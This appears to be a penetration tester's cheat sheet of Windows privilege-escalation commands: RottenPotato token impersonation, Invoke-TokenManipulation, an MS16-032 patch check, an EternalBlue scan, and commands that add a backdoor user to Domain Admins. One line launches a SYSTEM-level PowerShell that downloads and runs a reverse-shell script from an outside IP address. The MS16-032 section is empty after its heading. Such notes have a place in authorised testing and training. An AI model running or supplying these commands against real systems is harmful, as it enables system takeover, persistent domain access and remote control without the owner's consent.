
Basic Exploits to Check

https://gist.github.com/ssstonebraker/a1964b2f20acc8edb239409b6c4906ce#gpo---pivoting-with-local-admin

PrivEsc Local Admin - Token Impersonation (RottenPotato)

Binary available at: https://github.com/foxglovesec/RottenPotato
Binary available at: https://github.com/breenmachine/RottenPotatoNG

getuid
getprivs
use incognito
list_tokens -u
cd c:\temp\
execute -Hc -f ./rot.exe
impersonate_token "NT AUTHORITY\SYSTEM"
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"

PrivEsc Local Admin - MS16-032

Affected: Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
Check if the patch is installed: wmic qfe list | find "3139914"

Powershell:

PrivEsc Local Admin - MS17-010 (Eternal Blue)

  • nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 ip_netblock

From Domain Admin to Local Admin

net user hacker2 hacker123 /add /Domain
net group "Domain Admins" hacker2 /add /domain